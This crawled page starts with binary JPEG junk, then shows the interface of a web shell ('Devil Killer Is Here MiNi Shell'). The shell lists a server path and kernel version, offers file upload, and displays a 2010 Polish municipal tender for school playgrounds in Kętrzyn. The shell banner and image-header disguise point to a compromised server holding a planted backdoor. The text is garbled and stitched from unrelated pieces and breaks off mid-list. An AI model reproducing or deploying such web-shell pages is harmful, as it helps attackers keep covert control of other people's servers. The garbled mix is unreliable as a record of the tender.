JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100727/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100727/226634-N-2010.html

<p class="kh_header"><b>Kętrzyn: Budowa placów zabaw przy szkołach podstawowych. Zagospodarowanie placów zabaw na terenie Szkół Podstawowych nr 1, nr 3, nr 4 oraz Zespołu Szkół  nr 1 z oddziałami integracyjnymi w Kętrzynie w ramach Rządowego programu Radosna Szkoła, wraz z dostawą i montażem wyposażenia placu</b><br>
<b>Numer ogłoszenia: 226634 - 2010; data zamieszczenia: 27.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Kętrzyn , ul. Wojska Polskiego 11, 11-400 Kętrzyn, woj. warmińsko-mazurskie, tel. 089 752 05 20, faks 089 752 05 31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ketrzyn.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa placów zabaw przy szkołach podstawowych. Zagospodarowanie placów zabaw na terenie Szkół Podstawowych nr 1, nr 3, nr 4 oraz Zespołu Szkół  nr 1 z oddziałami integracyjnymi w Kętrzynie w ramach Rządowego programu Radosna Szkoła, wraz z dostawą i montażem wyposażenia placu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: Budowa placów zabaw przy szkołach podstawowych. Zagospodarowanie placów zabaw na terenie Szkół Podstawowych nr 1, nr 3, nr 4 oraz Zespołu Szkół  nr 1 z oddziałami integracyjnymi w Kętrzynie w ramach Rządowego programu Radosna Szkoła, wraz z dostawą i montażem wyposażenia placu. W skład zamówienia wchodzi następujący zakres robót:
a)	Szkoła Podstawowa nr 1 im. Feliksa Nowowiejskiego ul. Kopernika 12 w Kętrzynie:
-Wykonanie robót ziemnych i podbudowy pod nawierzchnie placu zabaw o powierzchni ok. 240m2;
- Wykonanie nawierzchni bezpiecznej placu zabaw i strefy komunikacyjnej - Szkolny plac zabaw w strefie do zabaw i ćwiczeń ruchowych (pomarańczowej) powinien być wyłożony nawierzchnią piankową lub gumową amortyzująca upadek dziecka z wysokości 0,65 - 3,0m,natomiast w strefie komunikacyjnej (niebieskiej) nawierzchnią typu tartan lub inna nawierzchnią syntetyczną, elastyczną, przepuszczalną, antypoślizgową, zgodna z normą EN-PN 1177 - ok. 180,0 m2;
- Wyposażenie placu zabaw w urządzenia zabawowe:

- Zestaw ogródkowy duży, wymiary ok. 9mx6m ; w skład zestawu wchodzą m.in. schodki bez poręczy, most wiszący na linach stalowych, wieża z pomostem wewnętrznym, drabina pozioma, zjeżdżalnia, kratownica; strefa bezpieczna ok. 12,0 x 8,4 m;
- Huśtawka ważka, dł. 3,0m ; strefa bezpieczna ok. 5,81 x 3,12m;
- Huśtawka podwójna z drabiną lub huśtawka podwójna i sprężynowiec; strefa bezpieczna ok. 8,10 x 6,71m;
- Równoważnia: Wys. 1,5m, dł. 2,5m ; strefa bezpieczna ok. 3,26 x 5,50m.
- Wykonanie ogrodzenia placu zabaw - żywopłot 60,5 mb wraz z furtką dwuskrzydłową o szerokości w świetle 150 cm i jednym skrzydle o szerokości w świetle 100 cm. Wysokość furtki około 100 cm, Furtka stalowa ocynkowana, wykończenie zewnętrzne powłoka poliestrowa w kolorze RAL 6005 (zielony); żywopłot: Dereń biały Elegantissima
- Urządzenie terenu zieleni: posadzenie drzew liściastych szt.7, drzew iglastych szt. 6 oraz założenie trawników;
- Umieszczenie elementów wyposażenia placu zabaw:
- Tablica informacyjna o utworzeniu placu zabaw w ramach Radosnej Szkoły ( z logo programu);
- Tablice informacyjne zawierające instrukcje korzystania z urządzeń;
- Ławeczki z oparciem, sztuk 2; wymiary 1,80mx0,64mx0,45; konstrukcja stalowa rurowa malowana proszkowo kolor niebieskim RAL 5022, siedzisko i oparcie wykonane z drewna sosnowego impregnowanego w kolorze oliwkowym, trwale zakotwione w ziemi. 
- Kosze na śmieci wykonywany w dwóch wersjach: jako mocowany do podłoża poprzez okrągłą płytkę i śruby rozporowe lub do zabetonowania w podłożu - malowany w kolorach: żółtym RAL 1033 zielonym RAL 6018 lub niebieskim RAL 5022, sztuk  2; pojemność kosza 30 l, średnica pojemnika 0,29m, wysokość otworu pojemnika od podłoża 1075 mm
b)	   Szkoła Podstawowa nr 3 im. Marii Zientary Malewskiej, ul. Bydgoska 1 w Kętrzynie:
- Wykonanie robót ziemnych i podbudowy pod nawierzchnie placu zabaw o powierzchni ok. 240m2;
- Wykonanie nawierzchni bezpiecznej placu zabaw i strefy komunikacyjnej - Szkolny plac zabaw w strefie do zabaw i ćwiczeń ruchowych (pomarańczowej) powinien być wyłożony nawierzchnią piankową lub gumową amortyzująca upadek dziecka z wysokości 0,65 - 3,0m,natomiast w strefie komunikacyjnej (niebieskiej) nawierzchnią typu tartan lub inna nawierzchnią syntetyczną, elastyczną, przepuszczalną, antypoślizgową, zgodna z normą EN-PN 1177 - ok. 192,0m2;
- Wyposażenie placu zabaw w urządzenia zabawowe:
- Zestaw ogródkowy duży, wymiary ok. 9mx6m ; w skład zestawu wchodzą m.in. schodki bez poręczy, most wiszący na linach stalowych, wieża z pomostem wewnętrznym, drabina pozioma, zjeżdżalnia, kratownica; strefa bezpieczna ok. 12,00 x 8,40 m;
- Huśtawka ważka, dł. 3,0m ; strefa bezpieczna ok. 4,50 x 3,05m;
- Urządzenie linowe drzewko, dł. 1,80m, szer. 1,80m, wys. 2,40m ; strefa bezpieczna średnica ok. 4,80m;
- Ściana wspinaczkowa: Wys. 2,6m, szer. 1,50m; strefa bezpieczna ok. 4,50 x 3,05m;
- Równoważnia: Wys. 1,5m, dł. 2,5m ; strefa bezpieczna ok. 3,26 x 5,50m.
-  Wykonanie ogrodzenia placu zabaw - żywopłot 60,5 mb wraz z furtką dwuskrzydłową o szerokości w świetle 150 cm i jednym skrzydle o szerokości w świetle 100 cm. Wysokość furtki około 100 cm, Furtka stalowa ocynkowana, wykończenie zewnętrzne powłoka poliestrowa w kolorze RAL 6005 (zielony); żywopłot: Dereń biały Elegantissima.
- Urządzenie terenu zieleni: posadzenie drzew liściastych szt.8, drzew iglastych szt. 5 oraz założenie trawników;
- Umieszczenie elementów wyposażenia placu zabaw:
- Tablica informacyjna o utworzeniu placu zabaw w ramach Radosnej Szkoły ( z logo programu);
 - Tablice informacyjne zawierające instrukcje korzystania z urządzeń;
 - Ławeczki z oparciem, sztuk 2; wymiary 1,80mx0,64mx0,45; konstrukcja stalowa rurowa malowana proszkowo kolor niebieskim RAL 5022, siedzisko i oparcie wykonane z drewna sosnowego impregnowanego w kolorze oliwkowym, trwale zakotwione w ziemi. 
- Kosze na śmieci wykonywany w dwóch wersjach: jako mocowany do podłoża poprzez okrągłą płytkę i śruby rozporowe lub do zabetonowania w podłożu - malowany w kolorach: żółtym RAL 1033 zielonym RAL 6018 lub niebieskim RAL 5022, sztuk  2; pojemność kosza 30 l, średnica pojemnika 0,29m, wysokość otworu pojemnika od podłoża 1075 mm

c)	    Szkoła Podstawowa nr 4 im. Stanisława Moniuszki ul. Moniuszki 1 w Kętrzynie
- Wykonanie robót ziemnych i podbudowy pod nawierzchnie placu zabaw o powierzchni ok. 240m2;
- Wykonanie nawierzchni bezpiecznej placu zabaw i strefy komunikacyjnej - Szkolny plac zabaw w strefie do zabaw i ćwiczeń ruchowych (pomarańczowej) powinien być wyłożony nawierzchnią piankową lub gumową amortyzująca upadek dziecka z wysokości 0,65 - 3,0m,natomiast w strefie komunikacyjnej (niebieskiej) nawierzchnią typu tartan lub inna nawierzchnią syntetyczną, elastyczną, przepuszczalną, antypoślizgową, zgodna z normą EN-PN 1177 - ok. 174,0m2;
- Wyposażenie placu zabaw w urządzenia zabawowe:
- Zestaw ogródkowy duży, wymiary ok. 9mx6m ; w skład zestawu wchodzą m.in. schodki bez poręczy, most wiszący na linach stalowych, wieża z pomostem wewnętrznym, drabina pozioma, zjeżdżalnia, kratownica; strefa bezpieczna ok. 12,00 x 8,40 m;
- Huśtawka ważka, dł. 3,0m ; strefa bezpieczna ok. 4,50 x 3,05m;
- Pociąg z wagonem: szerokość 1,50m, dł. lokomotywy 2,50m, dł. wagonika 3,0m; strefa bezpieczna ok. 4,40 x 8,50m;
- Ściana wspinaczkowa: Wys. 2,6m, szer. 1,50m; strefa bezpieczna ok. 4,50 x 3,05m;
- Równoważnia: Wys. 1,5m, dł. 2,5m ; strefa bezpieczna ok. 3,26 x 5,50m.
- Wykonanie ogrodzenia placu zabaw - żywopłot 60,5 mb wraz z furtką dwuskrzydłową o szerokości w świetle 150 cm i jednym skrzydle o szerokości w świetle 100 cm. Wysokość furtki około 100 cm, Furtka stalowa ocynkowana, wykończenie zewnętrzne powłoka poliestrowa w kolorze RAL 6005 (zielony); żywopłot: Dereń biały Elegantissima
- Urządzenie terenu zieleni, posadzenie drzew liściastych szt.8, drzew iglastych szt. 6 oraz założenie trawników;
- Umieszczenie elementów wyposażenia placu zabaw:
- Tablica informacyjna o utworzeniu placu zabaw w ramach  Radosnej Szkoły ( z logo programu);
- Tablice informacyjne zawierające instrukcje korzystania z urządzeń;
- Ławeczki z oparciem, sztuk 2; wymiary 1,80mx0,64mx0,45; konstrukcja stalowa rurowa malowana proszkowo kolor niebieskim RAL 5022, siedzisko i oparcie wykonane z drewna sosnowego impregnowanego w kolorze oliwkowym, trwale zakotwione w ziemi. 
- Kosze na śmieci wykonywany w dwóch wersjach: jako mocowany do podłoża poprzez okrągłą płytkę i śruby rozporowe lub do zabetonowania w podłożu - malowany w kolorach: żółtym RAL 1033 zielonym RAL 6018 lub niebieskim RAL 5022, sztuk  2; pojemność kosza 30 l, średnica pojemnika 0,29m, wysokość otworu pojemnika od podłoża 1075 mm
d)	Zespół Szkół nr 1 z oddziałami integracyjnymi im. Macieja Kalenkiewicza Kotwicza ul. Kazimierza     Wielkiego 12 w Kętrzynie:
- Wykonanie robót ziemnych i podbudowy pod nawierzchnie placu zabaw o powierzchni ok. 240m2;
- Wykonanie nawierzchni bezpiecznej placu zabaw i strefy komunikacyjnej - Szkolny plac zabaw w strefie do zabaw i ćwiczeń ruchowych (pomarańczowej) powinien być wyłożony nawierzchnią piankową lub gumową amortyzująca upadek dziecka z wysokości 0,65 - 3,0m,natomiast w strefie komunikacyjnej (niebieskiej) nawierzchnią typu tartan lub inna nawierzchnią syntetyczną, elastyczną, przepuszczalną, antypoślizgową, zgodna z normą EN-PN 1177 - ok. 184,00m2;
- Wyposażenie placu zabaw w urządzenia zabawowe:
- Zestaw ogródkowy duży, wymiary ok. 9mx6m ; w skład zestawu wchodzą m.in. schodki bez poręczy, most wiszący na linach stalowych wieża z pomostem wewnętrznym, drabina pozioma, zjeżdżalnia, kratownica; strefa bezpieczna ok. 12,0 x 8,4 m;
- Huśtawka ważka, dł. 3,0m; ; strefa bezpieczna ok. 4,50 x 3,05m;
- Pociąg z wagonem: szerokość 1,50m, dł. lokomotywy 2,50m, dł. wagonika 3,0m; strefa bezpieczna ok. 4,40 x 8,50m;
- Ściana wspinaczkowa: Wys. 2,6m, szer. 1,50m; strefa bezpieczna ok. 4,50 x 3,05m;
- Równoważnia: Wys. 1,5m, dł. 2,5m ; strefa bezpieczna ok. 3,26 x 5,50m;
- Wykonanie ogrodzenia placu zabaw - żywopłot 60,5 mb wraz z furtką dwuskrzydłową o szerokości w świetle 150 cm i jednym skrzydle o szerokości w świetle 100 cm. Wysokość furtki około 100 cm, Furtka stalowa ocynkowana, wykończenie zewnętrzne powłoka poliestrowa w kolorze RAL 6005 (zielony); żywopłot Pęcherznica kalinolistna Diabolo
- Urządzenie terenu zieleni, posadzenie drzew liściastych szt.8, drzew iglastych szt. 6 oraz założenie trawników;
- Umieszczenie elementów wyposażenia placu zabaw:
- Tablica informacyjna o utworzeniu placu zabaw w ramach Radosnej Szkoły ( z logo programu);
- Tablice informacyjne zawierające instrukcje korzystania z urządzeń;
- Ławeczki z oparciem, sztuk 2; wymiary 1,80mx0,64mx0,45; konstrukcja stalowa rurowa malowana proszkowo kolor niebieskim RAL 5022, siedzisko i oparcie wykonane z drewna sosnowego impregnowanego w kolorze oliwkowym, trwale zakotwione w ziemi. 
- Kosze na śmieci wykonywany w dwóch wersjach: jako mocowany do podłoża poprzez okrągłą płytkę i śruby rozporowe lub do zabetonowania w podłożu - malowany w kolorach: żółtym RAL 1033 zielonym RAL 6018 lub niebieskim RAL 5022, sztuk  2; pojemność kosza 30 l, średnica pojemnika 0,29m, wysokość otworu pojemnika od podłoża 1075 mm
2.	Szczegółowy zakres robót określa projekt budowany placu zabaw dla dzieci w ramach Rządowego programu Radosna Szkoła oraz specyfikacja techniczna wykonania i odbioru robót stanowiąca załącznik do SIWZ;
3.	W stosunku do urządzeń wyposażenia placów zabaw opisanych w dokumentacji projektowej Zamawiający dopuszcza rozszerzone wersje tych urządzeń, jeżeli wynika to z asortymentu producenta zestawów zabawowych i mieści się w strefie bezpieczeństwa danych urządzeń i spełnia zapisy ppkt. 5 niniejszego pkt ogłoszenia o zamówieniu.
4.	Dostarczone elementy zamówienia muszą posiadać, wystawione przez upoważnione jednostki certyfikujące, certyfikaty:
- Wyposażenie placu zabaw Certyfikat za zgodność z normą:  PN-EN 1177 - 2009 lub PN-EN 1176 - 2009 DIN EN 1176, PN-EN 748, PN-EN 749, PN-EN 1270, PN-EN 1809 i inne właściwe normy 
- Nawierzchnia bezpieczna i strefa komunikacyjna typu tartan, Certyfikat badania na zgodność z normą PN-EN 1176 - 2009 , lub na zgodność z normą PN-EN 1177 - 2009. 
Wykonawca zobowiązany będzie do przedstawienia Zamawiającemu powyższych certyfikatów podczas odbioru końcowego robót.  
5.	Zamawiający dopuszcza składanie ofert równoważnych (produktów równoważnych nie gorszych pod względem posiadanych parametrów jakościowych i technicznych) na produkty określone za pomocą nazw producentów pod warunkiem, że oferowane produkty posiadają parametry techniczne i jakościowe co najmniej takie same jak produkty podane za pomocą nazw producenta w dokumentacji opisującej przedmiot zamówienia. Ofertą równoważną jest przedmiot o takich samych lub lepszych parametrach technicznych, jakościowych, funkcjonalnych spełniający minimalne parametry określone przez Zamawiającego. W takim przypadku Wykonawca zobowiązany jest przedstawić wraz z ofertą szczegółową specyfikację, z której w sposób nie budzący wątpliwości Zamawiającego winno wynikać, iż zaoferowany asortyment jest o takich samych lub lepszych parametrach technicznych w odniesieniu do asortymentu określonego przez Zamawiającego w opisie przedmiotu zamówienia. Zamawiający dopuszcza tolerancje wymiarową dla urządzeń rekreacyjnych podanych w projekcie jako gotowy produkt o wielkości do +/-10%..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9, 45.00.00.00-7, 45.11.12.00-0, 45.23.32.50-6, 37.53.52.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1)	Zamawiający wymaga wniesienia wadium,
2)	wadium w wysokości 10.000,00 złotych należy wnieść przed upływem terminu na składanie ofert,
3)	Wadium może być wnoszone w jednej lub kilku następujących formach: 
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (j.t. Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.).
4)	wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy: Pekao SA nr konta  94 1240 5598 1111 0000 5032 0624 z dopiskiem (tytuł postępowania, którego wadium dotyczy) w terminie do dnia 11.08.2010r. do godz. 09:00, a kopię dowodu wpłaty dołączyć do oferty. Za termin wniesienia wadium uważa się datę wpłynięcia środków na konto wskazane przez Zamawiającego. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. 
5)	wadium w pozostałych formach należy wnieść wraz z ofertą, przy czym należy je dołączyć w sposób umożliwiający późniejszy zwrot. 
6)	Wadium musi obejmować cały okres związania ofertą. 
7)	Wadium wniesione przez jednego ze wspólników konsorcjum uważa się za wniesione prawidłowo. 
8)	Wadium składane w formie innej niż pieniądz musi zawierać klauzule gwarantujące bezwarunkową wypłatę na rzecz zamawiającego w przypadku wystąpienia okoliczności wymienionych w art. 46 ust. 4a i ust. 5 ustawy.
Okoliczności te muszą zawierać sytuacje określone:
1)	w art. 46 ust. 4a ustawy Pzp, tj. jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp nie złożył dokumentów lub  oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie
2)	w art. 46 ust. 5 ustawy Pzp, tj.: jeżeli Wykonawca, którego oferta została wybrana:
d.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
e.	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
f.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
9)	Wykonawca, którego oferta nie będzie zabezpieczona wadium wniesionym we właściwej formie, terminie i kwocie zostanie wykluczony z przedmiotowego postępowania. 
10)	Zamawiający zwróci lub zatrzyma wadium zgodnie z art. 46 ustawy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy- zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną robotę, w której wystąpiły roboty związane z wykonaniem sztucznej nawierzchni bezpiecznej o powierzchni min.150m2 wraz z montażem wyposażenia sportowego lub urządzeń placu zabaw .
(Zamawiający pod pojęciem nawierzchni bezpiecznej rozumie nawierzchnie strefy bezpiecznej i strefy komunikacyjnej placu zabaw, jak również nawierzchnie sportową)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy na zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie:
- co najmniej jednym kierownikiem budowy, który posiada uprawnienia budowlane w specjalności konstrukcyjno-budowlanej do pełnienia takiej funkcji w budownictwie lub inne uprawnienia  umożliwiające wykonywanie tych samych czynności do wykonywania których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w tej specjalności</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy na zał. nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
